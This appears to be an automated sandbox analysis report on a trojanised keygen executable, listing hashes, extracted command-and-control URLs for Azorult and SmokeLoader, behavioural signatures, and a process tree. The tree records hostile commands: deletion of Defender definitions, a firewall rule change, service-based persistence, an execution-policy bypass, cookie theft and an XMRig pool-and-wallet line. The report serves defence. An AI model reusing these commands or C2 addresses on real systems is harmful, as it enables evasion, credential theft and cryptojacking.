Overview

overview

10

Static

static

8

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

3

ฺฺฺK...ฺฺ

windows10_x64

4

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

4

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

3

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

  • max time kernel
    684s
  • max time network
    698s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-11-2020 17:26

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe

  • Size

    9.5MB

  • MD5

    edcc1a529ea8d2c51592d412d23c057e

  • SHA1

    1d62d278fe69be7e3dde9ae96cc7e6a0fa960331

  • SHA256

    970645912c0c0b6eb857236e6bcbfcafcb0eaf0f19d2b278c5b180ee31bb8a5d

  • SHA512

    c8d9fc14c74c87284ed92d7879e5968129572b8fc4e921f48a14b82b98f26737f89daa87213cd9068fa53a8ef84b8e07f1ce053f06790d417ff8dc621b346cab

Score
10/10
azorultsmokeloadertofseexmrigbackdoorbootkitdiscoveryevasioninfostealermacrominerpersistencespywarestealertrojanupx

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://vintrsi.com/upload/

http://woatdert.com/upload/

http://waruse.com/upload/
rc4.i32
rc4.i32

Extracted

Family

smokeloader

Version

2019

C2

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

    evasion
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Disables Task Manager via registry modification
    evasion
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 42 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Suspicious Office macro 2 IoCs

    Office document equipped with 4.0 macros.

    macro
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 11 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spyware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • JavaScript code in executable 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 162 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 41 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Checks SCSI registry key(s) 3 TTPs 117 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 7 IoCs
  • Modifies registry class 278 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3359 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 258 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 262 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
    1⤵
      PID:788
      • C:\Windows\TEMP\CBBEDF528F97C51A.exe
        C:\Windows\TEMP\CBBEDF528F97C51A.exe
        2⤵
        • Executes dropped EXE
        PID:4008
        • C:\Users\Admin\AppData\Local\Temp\is-0OS4Q.tmp\CBBEDF528F97C51A.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-0OS4Q.tmp\CBBEDF528F97C51A.tmp" /SL5="$601BE,761193,121344,C:\Windows\TEMP\CBBEDF528F97C51A.exe"
          3⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Suspicious use of FindShellTrayWindow
          PID:4004
          • C:\Program Files (x86)\RearRips\seed.sfx.exe
            "C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s1
            4⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            PID:576
            • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
              "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks SCSI registry key(s)
              • Suspicious behavior: MapViewOfSection
              PID:2044
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c "start https://iplogger.org/14Ahe7"
            4⤵
            • Checks computer location settings
            PID:712
    • C:\Users\Admin\AppData\Local\Temp\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
      "C:\Users\Admin\AppData\Local\Temp\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:984
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1348
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
          intro.exe 1O5ZF
          3⤵
          • Executes dropped EXE
          PID:1428
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2144
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1832
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
              5⤵
                PID:1824
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
            keygen-step-1.exe
            3⤵
            • Executes dropped EXE
            PID:516
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
            keygen-step-4.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3776
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\002.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\002.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:3724
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1780
              • C:\Users\Admin\AppData\Local\Temp\sib31B.tmp\0\setup.exe
                "C:\Users\Admin\AppData\Local\Temp\sib31B.tmp\0\setup.exe" -s
                5⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:492
                • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe
                  "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
                  6⤵
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Writes to the Master Boot Record (MBR)
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Modifies system certificate store
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:3556
                  • C:\Windows\SysWOW64\msiexec.exe
                    msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                    7⤵
                    • Enumerates connected drives
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:4052
                  • C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe
                    C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe 0011 installp1
                    7⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Writes to the Master Boot Record (MBR)
                    • Suspicious use of SetThreadContext
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:2236
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                      8⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:2780
                    • C:\Users\Admin\AppData\Roaming\1605720808900.exe
                      "C:\Users\Admin\AppData\Roaming\1605720808900.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605720808900.txt"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      PID:1620
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                      8⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:2776
                    • C:\Users\Admin\AppData\Roaming\1605720814040.exe
                      "C:\Users\Admin\AppData\Roaming\1605720814040.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605720814040.txt"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      PID:2128
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                      8⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:524
                    • C:\Users\Admin\AppData\Roaming\1605720819588.exe
                      "C:\Users\Admin\AppData\Roaming\1605720819588.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605720819588.txt"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      PID:436
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                      8⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:1048
                    • C:\Users\Admin\AppData\Roaming\1605720822432.exe
                      "C:\Users\Admin\AppData\Roaming\1605720822432.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605720822432.txt"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      PID:1372
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe"
                      8⤵
                        PID:2768
                        • C:\Windows\SysWOW64\PING.EXE
                          ping 127.0.0.1 -n 3
                          9⤵
                          • Runs ping.exe
                          PID:1176
                    • C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe
                      C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe 200 installp1
                      7⤵
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Writes to the Master Boot Record (MBR)
                      • Checks SCSI registry key(s)
                      • Suspicious use of SetWindowsHookEx
                      PID:2244
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c taskkill /f /im chrome.exe
                        8⤵
                          PID:3896
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im chrome.exe
                            9⤵
                            • Kills process with taskkill
                            PID:1356
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe"
                          8⤵
                            PID:2192
                            • C:\Windows\SysWOW64\PING.EXE
                              ping 127.0.0.1 -n 3
                              9⤵
                              • Runs ping.exe
                              PID:2164
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
                          7⤵
                          • Suspicious use of WriteProcessMemory
                          PID:816
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1 -n 3
                            8⤵
                            • Runs ping.exe
                            PID:1604
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\jg2_2qua.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\jg2_2qua.exe"
                    4⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2404
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\hjjgaa.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\hjjgaa.exe"
                    4⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Suspicious use of WriteProcessMemory
                    PID:3976
                    • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
                      5⤵
                      • Executes dropped EXE
                      PID:2604
                    • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
                      5⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4036
            • C:\Windows\system32\msiexec.exe
              C:\Windows\system32\msiexec.exe /V
              1⤵
              • Enumerates connected drives
              • Modifies service
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1036
              • C:\Windows\syswow64\MsiExec.exe
                C:\Windows\syswow64\MsiExec.exe -Embedding AAED12D6D2C6FD2CD2E7635D80054973 C
                2⤵
                • Loads dropped DLL
                PID:2208
              • C:\Windows\system32\srtasks.exe
                C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                2⤵
                • Modifies service
                PID:3548
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
              • Modifies service
              PID:2416
            • \??\c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
              1⤵
              • Checks SCSI registry key(s)
              • Modifies data under HKEY_USERS
              PID:3612
            • C:\Windows\system32\compattelrunner.exe
              C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
              1⤵
                PID:1164
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                1⤵
                • Drops file in Windows directory
                • Modifies Control Panel
                • Modifies Internet Explorer settings
                • Modifies registry class
                • Suspicious use of SetWindowsHookEx
                PID:3248
              • C:\Windows\system32\browser_broker.exe
                C:\Windows\system32\browser_broker.exe -Embedding
                1⤵
                • Modifies Internet Explorer settings
                PID:4056
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:1364
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies Internet Explorer settings
                • Modifies registry class
                PID:2600
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                PID:2256
              • C:\Users\Admin\AppData\Local\Temp\9F47.exe
                C:\Users\Admin\AppData\Local\Temp\9F47.exe
                1⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Modifies system certificate store
                PID:4284
                • C:\Windows\SysWOW64\icacls.exe
                  icacls "C:\Users\Admin\AppData\Local\aa83639c-00d5-446e-8af9-b6454509b02a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                  2⤵
                  • Modifies file permissions
                  PID:4720
                • C:\Users\Admin\AppData\Local\Temp\9F47.exe
                  "C:\Users\Admin\AppData\Local\Temp\9F47.exe" --Admin IsNotAutoStart IsNotTask
                  2⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:4912
                  • C:\Users\Admin\AppData\Local\5b887580-0084-400a-9de9-6bb00af8ced6\updatewin1.exe
                    "C:\Users\Admin\AppData\Local\5b887580-0084-400a-9de9-6bb00af8ced6\updatewin1.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:4908
                    • C:\Users\Admin\AppData\Local\5b887580-0084-400a-9de9-6bb00af8ced6\updatewin1.exe
                      "C:\Users\Admin\AppData\Local\5b887580-0084-400a-9de9-6bb00af8ced6\updatewin1.exe" --Admin
                      4⤵
                      • Executes dropped EXE
                      PID:4440
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
                        5⤵
                          PID:4364
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"
                          5⤵
                            PID:5052
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\script.ps1
                              6⤵
                                PID:4148
                            • C:\Program Files\Windows Defender\mpcmdrun.exe
                              "C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all
                              5⤵
                              • Deletes Windows Defender Definitions
                              PID:4288
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""
                              5⤵
                                PID:1340
                          • C:\Users\Admin\AppData\Local\5b887580-0084-400a-9de9-6bb00af8ced6\updatewin2.exe
                            "C:\Users\Admin\AppData\Local\5b887580-0084-400a-9de9-6bb00af8ced6\updatewin2.exe"
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            PID:4904
                          • C:\Users\Admin\AppData\Local\5b887580-0084-400a-9de9-6bb00af8ced6\5.exe
                            "C:\Users\Admin\AppData\Local\5b887580-0084-400a-9de9-6bb00af8ced6\5.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:4928
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\5b887580-0084-400a-9de9-6bb00af8ced6\5.exe & exit
                              4⤵
                                PID:4752
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im 5.exe /f
                                  5⤵
                                  • Kills process with taskkill
                                  PID:372
                        • C:\Users\Admin\AppData\Local\Temp\A052.exe
                          C:\Users\Admin\AppData\Local\Temp\A052.exe
                          1⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:4304
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /im A052.exe /f & erase C:\Users\Admin\AppData\Local\Temp\A052.exe & exit
                            2⤵
                              PID:4692
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /im A052.exe /f
                                3⤵
                                • Kills process with taskkill
                                PID:4760
                          • C:\Users\Admin\AppData\Local\Temp\A796.exe
                            C:\Users\Admin\AppData\Local\Temp\A796.exe
                            1⤵
                            • Executes dropped EXE
                            PID:4332
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bsedfwyy\
                              2⤵
                                PID:4656
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mdljtovj.exe" C:\Windows\SysWOW64\bsedfwyy\
                                2⤵
                                  PID:4740
                                • C:\Windows\SysWOW64\sc.exe
                                  "C:\Windows\System32\sc.exe" create bsedfwyy binPath= "C:\Windows\SysWOW64\bsedfwyy\mdljtovj.exe /d\"C:\Users\Admin\AppData\Local\Temp\A796.exe\"" type= own start= auto DisplayName= "wifi support"
                                  2⤵
                                    PID:4800
                                  • C:\Windows\SysWOW64\sc.exe
                                    "C:\Windows\System32\sc.exe" description bsedfwyy "wifi internet conection"
                                    2⤵
                                      PID:4932
                                    • C:\Windows\SysWOW64\sc.exe
                                      "C:\Windows\System32\sc.exe" start bsedfwyy
                                      2⤵
                                        PID:5012
                                      • C:\Windows\SysWOW64\netsh.exe
                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                        2⤵
                                          PID:4168
                                      • C:\Users\Admin\AppData\Local\Temp\AC1B.exe
                                        C:\Users\Admin\AppData\Local\Temp\AC1B.exe
                                        1⤵
                                        • Executes dropped EXE
                                        PID:4360
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\AC1B.exe
                                          2⤵
                                            PID:4264
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 3
                                              3⤵
                                              • Delays execution with timeout.exe
                                              PID:4548
                                        • C:\Windows\system32\compattelrunner.exe
                                          C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                          1⤵
                                            PID:4440
                                          • C:\Users\Admin\AppData\Local\Temp\B64E.exe
                                            C:\Users\Admin\AppData\Local\Temp\B64E.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:4556
                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                            1⤵
                                            • Modifies registry class
                                            PID:5004
                                          • C:\Windows\SysWOW64\bsedfwyy\mdljtovj.exe
                                            C:\Windows\SysWOW64\bsedfwyy\mdljtovj.exe /d"C:\Users\Admin\AppData\Local\Temp\A796.exe"
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:5108
                                            • C:\Windows\SysWOW64\svchost.exe
                                              svchost.exe
                                              2⤵
                                              • Drops file in System32 directory
                                              • Suspicious use of SetThreadContext
                                              • Modifies data under HKEY_USERS
                                              PID:4768
                                              • C:\Windows\SysWOW64\svchost.exe
                                                svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                                                3⤵
                                                  PID:4216
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                              • Modifies registry class
                                              PID:2464
                                            • C:\Users\Admin\AppData\Local\Temp\E8C9.exe
                                              C:\Users\Admin\AppData\Local\Temp\E8C9.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: MapViewOfSection
                                              PID:5048
                                            • C:\Users\Admin\AppData\Local\Temp\F3C6.exe
                                              C:\Users\Admin\AppData\Local\Temp\F3C6.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Checks whether UAC is enabled
                                              PID:4536
                                            • C:\Users\Admin\AppData\Local\Temp\F86B.exe
                                              C:\Users\Admin\AppData\Local\Temp\F86B.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:572
                                              • C:\Users\Admin\AppData\Local\Temp\F86B.exe
                                                C:\Users\Admin\AppData\Local\Temp\F86B.exe
                                                2⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: MapViewOfSection
                                                PID:4144
                                            • C:\Users\Admin\AppData\Local\Temp\5C85.exe
                                              C:\Users\Admin\AppData\Local\Temp\5C85.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Drops startup file
